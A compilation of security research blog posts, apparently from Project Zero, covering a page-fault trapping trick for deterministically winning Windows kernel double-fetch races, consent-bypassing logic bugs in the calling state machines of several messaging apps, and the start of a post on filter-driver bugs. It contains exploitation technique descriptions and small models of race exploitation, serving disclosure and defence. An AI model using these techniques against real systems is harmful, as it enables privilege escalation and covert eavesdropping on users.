Next the code will read the Type field which is on page N ②. This page isn’t currently in memory and so when it’s accessed a page fault will occur ③. This requires the kernel to read the contents from the file, which we can detect and delay. When the read is detected we have as long as we need to modify the Size field to contain a value larger than the LocalBuffer size ④. Finally we complete the read, which will restart the thread back at the Type field read instruction ⑤. The code can continue and will now read the overly large Size field and cause memory corruption.
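To make the ordering of steps ① to ⑤ concrete, here is a small single-threaded model of the sequence. It is a sketch under stated assumptions, not the real kernel behavior: `TrappedMemory`, `vulnerable_handler` and `run` are hypothetical names, the page fault is modeled as a callback fired once on the first read of an unresolved page, and type 2 is treated as the invalid type as described in the text.

```python
PAGE_SIZE = 4096
LOCAL_BUFFER_SIZE = 256


class TrappedMemory:
    """Model of a user buffer where the first read of an unresolved page fires a callback."""

    def __init__(self, size, unresolved, on_fault):
        self.data = bytearray(size)
        self.unresolved = set(unresolved)
        self.on_fault = on_fault

    def write_dword(self, offset, value):
        # Attacker-side write; does not go through the trap in this model.
        self.data[offset:offset + 4] = value.to_bytes(4, "little")

    def read_dword(self, offset):
        page = offset // PAGE_SIZE
        if page in self.unresolved:
            self.unresolved.discard(page)   # one shot: the page is resolved afterwards
            self.on_fault(self, page)       # attacker code runs while the reader is blocked
        return int.from_bytes(self.data[offset:offset + 4], "little")


def vulnerable_handler(mem, base):
    """Mirror of the check-then-copy pattern; returns the length the copy would use."""
    if mem.read_dword(base) > LOCAL_BUFFER_SIZE or mem.read_dword(base + 4) == 2:
        return None                         # STATUS_INVALID_PARAMETER
    return mem.read_dword(base)             # second fetch of Size


def run(trap: bool):
    base = PAGE_SIZE - 4                    # Size on page 0, Type on page 1

    def on_fault(mem, page):
        mem.write_dword(base, 0x1000)       # step 4: enlarge Size while the read is delayed

    mem = TrappedMemory(2 * PAGE_SIZE, {1} if trap else set(), on_fault)
    mem.write_dword(base, 16)               # passes the size check
    mem.write_dword(base + 4, 1)            # a valid type
    return vulnerable_handler(mem, base)
```

In this model `run(trap=False)` returns the original size, while `run(trap=True)` returns the enlarged value every time, because the modification is ordered by the fault rather than by thread timing.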

The key takeaway is that if between the double fetch points the code touches any user mode memory under your control which is not the one being double fetched it should be possible to convert that into a deterministic exploit. It doesn’t matter if the target system only has a single CPU, what the scheduling algorithm is in the kernel, how many instructions are between the double fetch points or what day of the week it is etc, it should “just work”.

The followup blog post on double-fetch exploitation gives some figures for exploitability. For the examples shown up to now, when the right timing window is chosen the chance of success can hit 100% after some number of seconds. As shown here, we can get 100% reliability on some classes of the same bug, but in the best case this isn’t an improvement other than being deterministic.

All examples up to now only demonstrate the exploitation of what the blog post refers to as arithmetic races. The blog also mentions a second class of bug, binary races, which are harder to exploit and never reach 100% success. Let’s look at the example in the blog and see if our exploitation trick would do better.

PVOID* UserPointer = // controlled user-mode address

__try {

   ProbeForWrite(*UserPointer, sizeof(STRUCTURE), 1);①

   RtlCopyMemory(*UserPointer, LocalPointer, sizeof(STRUCTURE));②

} __except (EXCEPTION_EXECUTE_HANDLER) {

   return GetExceptionCode();

}

On the face of it this doesn’t look massively different to previous examples; however, in this case the destination pointer is being changed rather than the size. The ProbeForWrite kernel API checks that the pointer is at a user-mode address and that the memory is writable. This is a commonly used idiom to verify a user supplied pointer is not pointing into kernel memory.

If the pointer value is changed between ① and ② from a user mode address to a kernel mode address the example would overwrite kernel memory. The behavior is harder to exploit with a probabilistic exploit as there are only two valid values of the pointer, either a user-mode address or a kernel mode address. If you’re brute forcing the pointer value then it’s possible to end up where both fetches read a user-mode pointer even though it might change to a kernel pointer in between the fetches.

Fortunately, due to the call to ProbeForWrite this is trivial to exploit if you can trap on user memory access as shown in the following diagram:

Diagram showing access to the UserPointer which is then passed to ProbeForWrite. We can generate a page fault when probing the buffer which can allow us to modify the original pointer.

From the diagram the first read from UserPointer is made ① and the resulting pointer value passed to ProbeForWrite. The ProbeForWrite API first checks if the pointer is in the user-mode address space, then probes each page of memory up to the size of the length parameter ②. If the page is invalid or is not writable then an exception will be generated and caught by the example's __except block. This gives us our exploit opportunity: we can use the exploitation trick on one of the user-mode pages being probed, which will cause ProbeForWrite to generate a page fault we can trap ③. As the address being probed is not the same as the one storing the pointer, we can modify the pointer to contain a kernel mode address while the request is trapped ④. The result is we can deterministically win the race.
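The binary race can be modeled the same way. This is a rough sketch rather than the real API: `probe_for_write` only imitates the two behaviors described above (an address-range check, then touching each page), the address constants are illustrative assumptions, and the one-element list `slot` stands in for the memory holding `*UserPointer`.

```python
PAGE_SIZE = 4096
USER_LIMIT = 0x7FFF_FFFF_0000            # assumed upper bound of user-mode addresses
USER_BUFFER = 0x10000                    # hypothetical user-mode buffer address
KERNEL_TARGET = 0xFFFF_8000_0000_1000    # hypothetical kernel address


class AccessViolation(Exception):
    pass


def probe_for_write(address, length, on_page_touch):
    """Imitation of the probe: range check first, then touch every page in the range."""
    if address + length > USER_LIMIT:
        raise AccessViolation(hex(address))
    for page in range(address // PAGE_SIZE, (address + length - 1) // PAGE_SIZE + 1):
        on_page_touch(page)              # a trapped page lets attacker code run here


def vulnerable_copy(slot, struct_size, on_page_touch):
    """Returns the destination the copy would write to."""
    probe_for_write(slot[0], struct_size, on_page_touch)   # first fetch of the pointer
    return slot[0]                                         # second fetch of the pointer


def run(trap: bool):
    slot = [USER_BUFFER]

    def swap_pointer(page):
        slot[0] = KERNEL_TARGET          # step 4: swap while the probe is blocked

    return vulnerable_copy(slot, 64, swap_pointer if trap else (lambda page: None))
```

The pointer is stored on a different page from the one being probed, so swapping it inside the trap never disturbs the probe itself; the second fetch simply observes the new value.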

Of course I’ve been focussing on kernel double fetches as it’s what originally drew me to look for this behavior. There are many scenarios where this can be used to aid exploitation of user-mode applications. The most obvious one is where a service is sharing memory with a lower privileged application. An example of this sort of issue was a double-fetch in the DfMarshal COM marshaler. The COM marshaler shared a memory section between processes so it was possible to provide a section which exploited our trick. In the end this trick wasn’t necessary as the logic of the vulnerable code allowed me to create an infinite loop to extend the double fetch window. However if that didn't exist we could use this trick to detect and delay when the code was at the point where the handle could be switched.

Another more subtle use is where a privileged process reads memory from a less privileged process. This might be explicit use of APIs such as ReadProcessMemory or it could be indirect, for example querying for the process’ command line using NtQueryInformationProcess will read out memory locations under our control.

The thing to remember with this exploitation trick is it can be used to open up the window to win a timing race. In this case it’s similar to my previous work on oplocks, but instead for memory access. In fact the access to memory might be incidental to the vulnerable code, it doesn’t have to be a memory double fetch or necessarily even a TOCTOU vulnerability. For example you might be trying to win a race between two file paths with symbolic links. As long as the vulnerable code can be made to probe a user mode address we control then you can use it as a timing signal and to widen the exploitation window.

Conclusions

I’ve described an exploitation trick by combining SMB and the Cloud File API which can aid in demonstrating exploitation of certain types of application and kernel vulnerabilities. It’s possible that there are other ways of achieving a similar result with APIs I haven’t looked at, but for now this is the best approach I’ve come up with. It allows you to trap on reads from user-mode memory, detect when the access occurs and delay the read for at least 60 seconds. Examples of code to implement the SMB and Cloud File API tricks are available here.

It’s worth just reiterating some more of the limitations of this exploitation trick before we conclude.

  • Can’t be used in a sandbox, only from a normal user privilege.
  • Only allows a one shot for any page mapped from the file. If something else (such as AV) tries to read that page or from the file then the trap may fire early.
  • Can’t detect the exact location of a read, limited to a granularity of 4KiB. For local access via the Cloud File API this will always populate the next 7 pages as well, as part of the 32KiB read. If accessing a custom SMB server the read size can be reduced to 4KiB. This would prevent exploitation of certain bugs which require precise trapping only on a small area within a larger structure.
  • Can only detect writes indirectly, can’t specifically trap on a write.
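The granularity limitation is easy to quantify. A minimal sketch, assuming (as the list above describes) that the read starts at the faulting page and covers the whole read size; `pages_populated` is a hypothetical helper for reasoning about which traps a single access consumes.

```python
PAGE_SIZE = 4 * 1024


def pages_populated(fault_offset: int, read_size: int) -> list[int]:
    """Page indexes filled in by one trapped read starting at the faulting page."""
    first = fault_offset // PAGE_SIZE
    count = max(1, read_size // PAGE_SIZE)
    return list(range(first, first + count))
```

For a 32KiB read, `pages_populated(0x5123, 32 * 1024)` covers pages 5 through 12, which is the faulting page plus the next 7. With a 4KiB read only page 5 is resolved, so traps on neighboring pages remain armed.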

From a practical perspective the trick presented here doesn’t significantly improve the win rates for traditional kernel double fetches outlined in the Bochspwn paper. Realistically for most of those classes of vulnerability you’d probably want to use a probabilistic approach, if anything due to its simplicity of implementation. However the trick is applicable to other bug classes where the memory trap is used as a deterministic timing signal adjunct to the vulnerability.

The one shot nature of the trick also makes it of no real benefit to exploiting simple double fetch code paths. Also, more complex code might read and write to a memory address more than once before you get to the vulnerable code, which might make managing traps more difficult.

The State of State Machines

Posted by Natalie Silvanovich, Project Zero

On January 29, 2019, a serious vulnerability was discovered in Group FaceTime which allowed an attacker to call a target and force the call to connect without user interaction from the target, allowing the attacker to listen to the target’s surroundings without their knowledge or consent. The bug was remarkable in both its impact and mechanism. The ability to force a target device to transmit audio to an attacker device without gaining code execution was an unusual and possibly unprecedented impact of a vulnerability. Moreover, the vulnerability was a logic bug in the FaceTime calling state machine that could be exercised using only the user interface of the device. While this bug was soon fixed, the fact that such a serious and easy to reach vulnerability had occurred due to a logic bug in a calling state machine -- an attack scenario I had never seen considered on any platform -- made me wonder whether other state machines had similar vulnerabilities as well. This post describes my investigation into calling state machines of a number of messaging platforms, including Signal, JioChat, Mocha, Google Duo, and Facebook Messenger.

WebRTC and State Machines

The majority of video conferencing applications are implemented using WebRTC, which I’ve discussed in several past blog posts.  WebRTC connections are created by exchanging call set-up information in Session Description Protocol (SDP) between peers, a process which is called signalling. Signalling is not implemented by WebRTC, which allows peers to exchange SDP in whatever secure communication message is available to them, usually WebSockets for web applications, and secure messaging for messaging applications.

There are a few types of SDP that can be exchanged by WebRTC peers. In a typical connection, the caller starts off by sending an SDP offer, and then the callee responds with an SDP answer. These messages contain most information that is needed to transmit and receive media, including codec support, encryption keys and much more. After the offer/answer exchange, peers can send SDP candidates to other peers. Candidates are potential network paths that the two peers can use to connect to each other, and SDP candidates contain information such as IP addresses and TURN servers. Peers usually send more than one candidate to a peer, and candidates can be sent at any time during a connection.
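For readers who haven't seen one, a candidate appears in SDP as an `a=candidate:` attribute line. The sketch below parses only the leading mandatory fields of such a line (foundation, component, transport, priority, address, port, type) and ignores any trailing extension attributes; the `Candidate` type and `parse_candidate` function are hypothetical names, and the address is from a documentation range.

```python
from typing import NamedTuple


class Candidate(NamedTuple):
    foundation: str
    component: int
    transport: str
    priority: int
    address: str
    port: int
    cand_type: str


def parse_candidate(line: str) -> Candidate:
    """Parse the mandatory fields of an SDP 'a=candidate:' attribute line."""
    prefix = "a=candidate:"
    if not line.startswith(prefix):
        raise ValueError("not a candidate line")
    fields = line[len(prefix):].split()
    if len(fields) < 8 or fields[6] != "typ":
        raise ValueError("malformed candidate line")
    return Candidate(fields[0], int(fields[1]), fields[2].lower(), int(fields[3]),
                     fields[4], int(fields[5]), fields[7])
```

For example, `parse_candidate("a=candidate:1 1 UDP 2122252543 192.0.2.10 54321 typ host")` yields a host candidate for 192.0.2.10 on port 54321.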

WebRTC connections maintain an internal state related to whether an offer or answer has been received and processed. However, applications that use WebRTC usually have to maintain their own state machine to manage the user state of the application. How the user state maps to the WebRTC state is a design choice made by the WebRTC integrator, which has both security and performance consequences. For example, some applications do not exchange any SDP until the callee user has interacted with the application to answer the call, while others set up the peer-to-peer connection and start sending audio and video from caller to callee before the callee is even notified of the call.

Regardless of design, transmitting audio or video from an input device must be directly enabled by application code using WebRTC. This is usually done using a feature called tracks. Every input device is considered a ‘track’, and each specific track must be added to a specific peer connection by calling addTrack (or language equivalent) before audio or video is transmitted. Tracks can also be disabled, which is useful for implementing mute and camera-off features. Each track also has an RTPSender property that can be used to fine-tune the properties of transmission, which can also be used to disable audio or video transmission.

Theoretically, ensuring callee consent before audio or video transmission should be a fairly simple matter of waiting until the user accepts the call before adding any tracks to the peer connection. However, when I looked at real applications they enabled transmission in many different ways. Most of these led to vulnerabilities that allowed calls to be connected without interaction from the callee.
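The "simple" design can be sketched as a state machine in which the only transition that adds a track is the local user accepting the call. This is an illustrative model, not code from any of the applications discussed: `FakePeerConnection` is a stand-in that merely records tracks, and the class and state names are hypothetical.

```python
from enum import Enum, auto


class CallState(Enum):
    RINGING = auto()
    ACCEPTED = auto()


class FakePeerConnection:
    """Stand-in for a WebRTC peer connection; it only records added tracks."""

    def __init__(self):
        self.tracks = []

    def add_track(self, track):
        self.tracks.append(track)


class CalleeCall:
    def __init__(self, pc):
        self.pc = pc
        self.state = CallState.RINGING

    def on_remote_message(self, msg_type):
        # Input from the remote peer never adds tracks, whatever its type.
        return None

    def on_user_accept(self):
        # The only path to add_track is a local user interaction.
        if self.state is CallState.RINGING:
            self.state = CallState.ACCEPTED
            self.pc.add_track("microphone")
```

The property worth preserving in a real implementation is that no handler reachable from network input can reach `add_track`.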

Signal Messenger

I looked at Signal in September 2019, and at that time, the application had a calling setup that is very similar to what is recommended in WebRTC documentation.

A peer-to-peer connection is established, and then the callee's audio track is added to the connection when the callee accepts the call by interacting with the user interface. Then a message is sent to the caller via the peer-to-peer connection, telling it to also move to the connected state and add the track.

Unfortunately, the application didn’t check that the device receiving the connect message was the caller device, so it was possible to send a connect message from the caller device to the callee. This caused the audio call to connect, allowing the caller to hear the callee’s surroundings. I tested this bug by changing Signal’s open-source code to send the message and recompiling the attacking client.
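The missing check amounts to validating the local role before acting on the connect message. The following sketch contrasts the two behaviors; the role and state strings are hypothetical and this is not Signal's actual code.

```python
def handle_connect_unchecked(local_role: str, state: str) -> str:
    """Acts on 'connect' regardless of which side received it."""
    return "connected"


def handle_connect_checked(local_role: str, state: str) -> str:
    """Only a caller that is waiting for the callee may act on 'connect'."""
    if local_role == "caller" and state == "dialing":
        return "connected"
    return state  # ignore the message and stay in the current state
```

With the unchecked handler a ringing callee moves to `connected` as soon as the message arrives; with the checked handler it stays in `ringing` until the user answers.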

This vulnerability was fixed in the client in September 2019, and since then, Signal’s signalling code has been replaced by the ringrtc project, which uses a more conservative state machine.

This bug was purely in Signal’s code, and was not due to a misunderstanding of WebRTC functionality. The state machine design was largely effective at requiring user consent to transmit audio, but a specific check was not implemented.

JioChat and Mocha

I accidentally found two very similar vulnerabilities in JioChat and Mocha messengers in July 2020 while testing whether a WebRTC exploit would work on them. They both had a similar signalling design, which was server-mediated.

The offer and answer are exchanged via the server, and then both the caller and the callee send their candidates to the server. The server then stores them until the callee interacts with their device and accepts the call. Then the peer-to-peer connection is created, and when WebRTC enters into its internal connected state, the track is added, causing audio and video to be transmitted.

This design has a fundamental problem, as candidates can be optionally included in an SDP offer or answer. In that case, the peer-to-peer connection will start immediately, as the only thing preventing the connection in this design is the lack of candidates, which will in turn lead to transmission from input devices. I tested this by using Frida to add candidates to the offers created by each of these applications. I was able to cause JioChat to send audio without user consent, and Mocha to send audio and video. Both of these vulnerabilities were fixed soon after they were filed by filtering SDP on the server.
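Filtering SDP on the server could look roughly like the sketch below, which drops embedded candidate lines from an offer or answer before relaying it. The post only says the fix filtered SDP on the server, so the exact rule is an assumption and `strip_candidates` is a hypothetical helper.

```python
def strip_candidates(sdp: str) -> str:
    """Remove 'a=candidate:' lines from an SDP blob, preserving line endings."""
    return "".join(
        line for line in sdp.splitlines(keepends=True)
        if not line.startswith("a=candidate:")
    )
```

Applied to an offer, this leaves the callee with no network path to try until candidates arrive through the normal server-held route. A text filter like this is only as good as its parsing, which is one reason the post recommends gating transmission on tracks instead.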

These issues were caused by a misunderstanding of how WebRTC works coupled with an attempt to improve WebRTC performance with an unusual signalling design. Normally, WebRTC integrators have to decide whether to wait until the callee has answered the call to set up the peer-to-peer connection. Setting the connection up early improves performance and prevents the user from having to wait when they answer a call, but also greatly increases the remote attack surface of WebRTC. These applications tried to improve performance without the security cost with this design, but didn’t consider all the ways that WebRTC can start a peer-to-peer connection.

It is generally not a good idea for integrators to gate audio or video transmission on any WebRTC feature that is not adding or enabling tracks. To start, many WebRTC features are complex, so it is easy to make a mistake that allows audio or video to be transmitted. Also, if the feature that is gated on is not commonly-used or not a security feature, it could be poorly tested or changed in the future.

Duo

I looked at Google Duo in September 2020. Duo’s signalling methodology is somewhat different from a lot of messengers because it supports a feature that allows the callee to preview the caller’s video before answering. So a one-way video stream needs to be set up before the call is answered.

The image above shows the setup of the one-way video stream. Dotted lines represent asynchronous calls made using Java executors. The lack of transmission from callee to caller is enforced by two methods. First, the SDP offer contains the property a=sendonly for video, which causes video to only be transmitted in one direction. Also, when the callee receives the offer from the caller, it adds the video track to the peer connection, but then disables it using the RTPSender property of the track (the audio track is not added or enabled until the user accepts the call).

Neither of these methods effectively prevents video from being transmitted from callee to caller. The SDP property is easy to get around because the caller provides the SDP to the callee, so it can be easily altered. Disabling the video track as soon as the offer is processed should work, except for the asynchronous design. Normally, the setLocalDescription method (which processes the SDP offer) calls the callback onSetSuccess, and then sets up the peer-to-peer connection after the callback has finished. However, if the callback makes another asynchronous call, the guarantee that onSetSuccess finishes before the connection is set up no longer holds, because the setLocalDescription method only waits for the onSetSuccess thread to finish. This creates a race between disabling the video and setting up the connection, so in some situations, the callee could transmit a few video frames to the caller before transmission is disabled.
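The ordering problem can be shown with a small single-threaded model. It is a sketch under assumptions: the `executor` deque stands in for work posted to another thread, the function names are hypothetical, and the asynchronous case is modeled as the unlucky ordering where the posted task runs after connection setup (in reality the order is nondeterministic).

```python
from collections import deque


def simulate(async_disable: bool) -> list[str]:
    """Return the order of events for a synchronous or asynchronous disable."""
    events = []
    executor = deque()  # tasks handed off to run later

    def disable_video():
        events.append("video_disabled")

    def on_set_success():
        if async_disable:
            executor.append(disable_video)  # callback returns before the work is done
        else:
            disable_video()

    # Model of setLocalDescription: run the callback, then set up the connection.
    on_set_success()
    events.append("connection_up")

    while executor:
        executor.popleft()()
    return events
```

`simulate(False)` disables video before the connection comes up, while `simulate(True)` leaves a window between `connection_up` and `video_disabled` in which frames could be sent.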

I tested this by using Frida to alter the SDP sent by the callee, and then I tried many methods to win the race. It turned out to be fairly hard to win, and I spent roughly two weeks trying to figure out how to slow down the video disable call enough to give the connection time to set up. I ended up sending multiple offers and adding candidates to the offers, which decreased the connection time, as the network connection was already established. Then I sent many messages that take a long time to process through the data channel of the peer-to-peer connection to slow down the disabling of the video track. Data messages are processed on the same thread queue as disabling the video track in Duo, so sending data messages filled up the queue that was needed to disable video with many other entries, delaying the track being disabled.
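The queue-filling step works because the disable task waits behind everything already queued. A toy model, assuming a strict FIFO queue and a fixed per-message processing cost (both simplifications; `disable_delay_ms` is a hypothetical helper):

```python
from collections import deque


def disable_delay_ms(data_messages: int, per_message_ms: float) -> float:
    """Time elapsed before the disable task at the back of the queue starts running."""
    queue = deque(["data"] * data_messages + ["disable_video"])
    elapsed = 0.0
    while queue:
        task = queue.popleft()
        if task == "disable_video":
            return elapsed
        elapsed += per_message_ms  # each data message is processed first
    raise RuntimeError("disable task was never queued")
```

In this model the delay grows linearly with the number of slow messages queued ahead of the disable task, which is the lever the attack pulls.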

This bug was fixed in December 2020 by removing the asynchronous call from onSetSuccess. While Duo generally designed signalling in a way that is effective in preventing video transmission from callee to caller, implementing the design asynchronously introduced problems. Asynchronous signalling implementations are becoming more common on mobile applications, as there are many unpredictable situations in which WebRTC needs to wait on the network or a peer, and separating function calls into different threads means a delay in one call won’t affect unrelated functionality. However, asynchronous calls make it more difficult to model how a state machine will behave in all situations, so it is important to be cautious about adding asynchronous calls to WebRTC signalling. In this case, the asynchronous call to disable the video track added nothing in terms of performance, as there is no reason any of the calls made to disable the track could block, and onSetSuccess already runs in its own thread and can yield to higher priority threads. It’s important to balance the risk and benefit of asynchronous calls and not indiscriminately include them in an application.

Facebook Messenger

I looked at Facebook Messenger in October 2020. It was a fairly challenging target because of the amount of reverse engineering required. Stepping back a bit, WebRTC has bindings in several programming languages which allow it to be integrated into applications using that language. Most Android applications that integrate WebRTC use the Java bindings. This makes investigating signalling state machines fairly straightforward, as important Java functions, such as setLocalDescription (which processes offers and answers), addRemoteIceCandidate (which processes candidates) and addTrack (which adds tracks to connections) can be hooked in Frida and logged for analysis. It is also reasonably straightforward to change the behavior of the attacker device using these calls.

Facebook Messenger does not use Java bindings to integrate WebRTC; instead, it uses C++ bindings. Moreover, it statically links WebRTC to a larger library (librtcR20.so, which is likely the rsys library mentioned in this article), so the symbols for calls to bindings get stripped, making them difficult to hook. In addition, Facebook Messenger serializes SDP into another format before it is transmitted, so it is difficult to determine how signalling works by monitoring traffic.

I eventually realized that the only reasonable way to figure out how Facebook Messenger signalling works was to figure out its network protocol. Thankfully, Facebook has publicly stated that they use fbthrift, a fork of thrift. I loaded the librtcR20.so library into IDA to see if I could find where it called into the thrift library, but while there were a few calls, it looked like the code was mostly statically linked. I eventually figured out that this is because thrift generates serialization code for every protocol implemented, so most of the serialization and deserialization code ends up compiled with the protocol processing code. So I decided to compile fbthrift, make a sample serializer and look at it in IDA, so I could get an impression of what compiled fbthrift serializers look like. I noticed that during serialization, members of an object are serialized by calling a method called writeFieldBegin. I also noticed that when this method is called, the field name is required, even though it is usually not included in the serialized output. So I looked for a function in librtcR20 that was very frequently called with different string parameters that seemed reasonable for field names. Not very many functions fulfilled those criteria, so I was able to identify writeFieldBegin.
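The search heuristic can be expressed as a ranking over call sites. This sketch assumes the call sites have already been exported from a disassembler as `(callee, string_argument)` pairs; that export format, and the function name, are hypothetical rather than the tooling used in the post.

```python
from collections import defaultdict


def rank_by_distinct_strings(call_records):
    """Rank callees by how many distinct string constants they are called with."""
    distinct = defaultdict(set)
    for callee, string_arg in call_records:
        distinct[callee].add(string_arg)
    return sorted(
        ((callee, len(strings)) for callee, strings in distinct.items()),
        key=lambda item: (-item[1], item[0]),
    )
```

A function that is called with many different short, identifier-like strings floats to the top of the ranking and becomes a candidate for writeFieldBegin, to be confirmed by hand.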

At this point, I could find many places where objects are serialized, and needed to identify which one was the message used to set up WebRTC calls.

Earlier, I’d noticed a method in the library called P2PCall::OnP2PMessageFromPeer (note that the symbol for this method is stripped, but the method name is logged when it is called). This seemed a likely place that a deserialized message would be processed. Searching for the string “P2PMessage”, I found the serialization code for a type called P2PMessageRequest. I assumed that this was where call setup messages were created.

Thrift serialization code is generated based on class definitions in a thrift definition file. Based on the field names and types passed to writeFieldBegin, I was able to slowly reverse engineer the complete thrift definition for this type. It was tedious work, because the definition was fairly long, and the code is obfuscated in a way that makes register use inconsistent, so I wasn’t confident that any automated approach would be accurate.

Below is a sample of the serialization code.

Notice that it writes two fields from an object of type Extmap. The first, named id, is a mandatory field. The function that writes the code is as follows.

The field identifier written is 1, and the field type is 8, which translates to i32 (32-bit integer). The second field is an optional field, and the registers to write it are set in the following code.

This sets the field name to uri, the field identifier to 2, and the field type to 8 (also i32). All together, this code can be represented by the following thrift definition.

```
struct Extmap {
        1: i32 id
        2: optional i32 uri
}
```

After similarly reverse engineering every field of the P2PMessageRequest type, I had a complete thrift definition, available here.
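To show how a field identifier and field type end up on the wire, here is a hand-rolled encoder for the Extmap struct using the layout of the Apache Thrift binary protocol (one type byte, a big-endian 16-bit field id, then the value, with a zero byte terminating the struct). The post does not say which wire protocol Facebook Messenger uses, so treat the protocol choice as an assumption; `encode_extmap` is a hypothetical helper, not generated code.

```python
import struct

T_STOP = 0  # end-of-struct marker
T_I32 = 8   # the field type 8 seen in the disassembly


def encode_extmap(id_: int, uri=None) -> bytes:
    """Encode Extmap as: [type:1][field id:2][value:4]... followed by a stop byte."""
    out = struct.pack(">bhi", T_I32, 1, id_)        # field 1: i32 id (mandatory)
    if uri is not None:
        out += struct.pack(">bhi", T_I32, 2, uri)   # field 2: optional i32 uri
    return out + struct.pack(">b", T_STOP)
```

Note that the field names `id` and `uri` never appear in the output, which matches the observation that writeFieldBegin takes a name it usually doesn't serialize. `encode_extmap(5).hex()` is `0800010000000500`.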

I did two things with this thrift definition. First, I used it to determine the layout of the P2PMessageRequest type in C++. This was extremely valuable, as it allowed me to load the struct definition into IDA with every single field named correctly. This made it much easier to understand how incoming messages are handled in P2PCall::OnP2PMessageFromPeer. This ended up being a bit of a process. fbthrift can generate C++ header files directly from a thrift definition, but these are very long and contain a lot of unnecessary definitions, and cannot be processed by IDA. So I ended up compiling the generated source and loading it into IDA, and then exporting the structure definitions and importing them into another IDA instance where librtcR20.so was already loaded. A few fields had different sizes in my compilation versus Facebook’s, but it was close enough that I could get it to work with a few modifications.

Below is an example of code decompiled in IDA with the thrift definition imported, to give an idea of how much easier it makes it to understand the processing of the message object.

I was also able to decode and generate messages sent over the network. To do this, I generated the serialization code from the thrift definition in Python, as thrift supports code generation in many languages. Then, I was able to import this code when using Frida Python to hook functions in Facebook Messenger.

Then I needed to find the code that handled incoming P2PMessageRequest messages. Since these messages are handled by native code, while most Facebook messages are handled by Java code, I looked for a native call with an appropriate name. I found com.facebook.webrtc.WebrtcEngine.onThriftMessageFromPeer. I hooked this method with Frida, and fed its byte array parameter into the generated deserializer, which decoded incoming messages.

I found a similar method used to send thrift messages, sendThriftToPeer (this method’s class name is obfuscated and changes in every version of Facebook Messenger, but it can be found by grepping the application’s smali). I was also able to hook this method, and alter its byte array parameter, to change a P2PMessageRequest message sent by Facebook Messenger.

Now, I was able to understand Facebook Messenger’s signalling state machine. There are two different ways that signalling can occur, depending on where the user is signed into Facebook Messenger. If the user is signed in on multiple devices or browsers, very little happens before the callee interacts with their device. The offer, answer and candidates are exchanged, but they are stored by the callee device and not processed until the callee user answers the call. This makes sense, because Facebook Messenger doesn’t know what device to connect to otherwise.

If the callee is only signed in on a single device, the state machine is more interesting.

In this case, Facebook Messenger enables the track as soon as an offer is received, but alters the offer so that all outgoing streams are inactive. It then replaces the offer with one where they are active when the user interacts with the device.

I was concerned that there might be a way to bypass the alteration of the offer, but I looked at how this was done, and while I generally don’t recommend using anything other than adding or disabling tracks to disable input device transmission, it was fairly robust. The offer is altered after the SDP is decoded into an internal WebRTC object, and the changes are made directly to this object, which eliminates the possibility of parsing errors.

However, looking at how incoming messages are handled, I noticed that many message types other than offers, answers and candidates are processed before the call is answered. One type that stood out was called SdpUpdate. When an SdpUpdate message is received, the local offer or answer is updated by calling setLocalDescription.

This message type didn’t do anything when sent to the state machine above, as it is already storing SDP and waiting to call setLocalDescription. But in the situation where the user is logged into two devices, it caused setLocalDescription to be called and started the audio connection.

It is not clear what the SdpUpdate message type is used for in Facebook Messenger. I tried many scenarios on my test devices, including network switchover, and was not able to generate one in normal use. Regardless, it is clear that it was not intended for this message type to be received before the call is answered. It is similar to the Signal bug described above, in that it is not related to the application’s use of WebRTC, but due to a missing check when handling input that can cause state transitions.
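One way to express the missing check is an allow-list of message types that may be handled before the call is answered, with everything else dropped. This is an illustrative sketch only: the set contents and the function name are assumptions, and it is not how Facebook Messenger or its server implements the check.

```python
# Hypothetical set of message types that are safe to handle before the callee answers.
PRE_ANSWER_ALLOWED = frozenset({"offer", "candidate", "hangup"})


def should_process(msg_type: str, call_answered: bool) -> bool:
    """Deny-by-default filter for signalling input that can cause state transitions."""
    return call_answered or msg_type in PRE_ANSWER_ALLOWED
```

A deny-by-default rule means a rarely used type such as SdpUpdate is rejected before the call is answered, even if nobody remembered to consider it explicitly.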

This vulnerability was fixed in November 2020 with server changes that prevent this message type from being sent before a call is connected.

Other Applications

There were a few other applications I looked at and did not find problems with their state machines. I looked at Telegram in August 2020, right after video conferencing was added to the application. I did not find any problems, largely because the application does not exchange the offer, answer or candidates until the callee has answered the call. I looked at Viber in November 2020, and did not find any problems with their state machine, though challenges reverse engineering the application made this analysis less rigorous than the other applications I looked at.

Discussion

The majority of calling state machines I investigated had logic vulnerabilities that allowed audio or video content to be transmitted from the callee to the caller without the callee’s consent. This is clearly an area that is often overlooked when securing WebRTC applications.

The majority of the bugs did not appear to be due to developer misunderstanding of WebRTC features. Instead, they were due to errors in how the state machines are implemented. That said, a lack of awareness of these types of issues was likely a factor. It is rare to find WebRTC documentation or tutorials that explicitly discuss the need for user consent when streaming audio or video from a user’s device.

Many of these state machines had needless complexity in how they handled call set-up, which was also a factor. Unnecessary threading, reliance on obscure features and large numbers of states and input types increase the likelihood of this type of vulnerability occurring in a signalling state machine.

It is also concerning to note that I did not look at any group calling features of these applications, and all the vulnerabilities reported were found in peer-to-peer calls. This is an area for future work that could reveal additional problems.

Conclusion

I investigated the signalling state machines of seven video conferencing applications and found five vulnerabilities that could allow a caller device to force a callee device to transmit audio or video data. All these vulnerabilities have since been fixed. It is not clear why this is such a common problem, but a lack of awareness of these types of bugs as well as unnecessary complexity in signalling state machines is likely a factor. Signalling state machines are a concerning and under-investigated attack surface of video conferencing applications, and it is likely that more problems will be found with further research.

Hunting for Bugs in Windows Mini-Filter Drivers

Posted by James Forshaw, Project Zero

In December Microsoft fixed 4 issues in Windows in the Cloud Filter and Windows Overlay Filter (WOF) drivers (CVE-2020-17103, CVE-2020-17134, CVE-2020-17136, CVE-2020-17139). These 4 issues were 3 local privilege escalations and a security feature bypass, and they were all present in Windows file system filter drivers. I’ve found a number of issues in filter drivers previously, including 6 in the LUAFV driver which implements UAC file virtualization.

The purpose of a file system filter driver according to Microsoft is:

“A file system filter driver can filter I/O operations for one or more file systems or file system volumes. Depending on the nature of the driver, filter can mean log, observe, modify, or even prevent. Typical applications for file system filter drivers include antivirus utilities, encryption programs, and hierarchical storage management systems.”

What this boils down to is the filter driver can inspect and modify almost any IO request sent to a file system. This power comes with many responsibilities, and considering the complexity of the IO model on Windows it can be hard to avoid introducing subtle bugs.

With the issues being fixed I thought it would be a good opportunity to go into a bit more detail on how you can research file system filter drivers, specifically the kind of things I looked at to find my security vulnerabilities. I’m going to give an overview of how filter drivers work, how you communicate with them, some hints on reverse engineering and some of the common security issues you might discover. I’ll also provide some example code to give you a basic idea of some common coding patterns. The goal is to allow you to do your own research in this area.

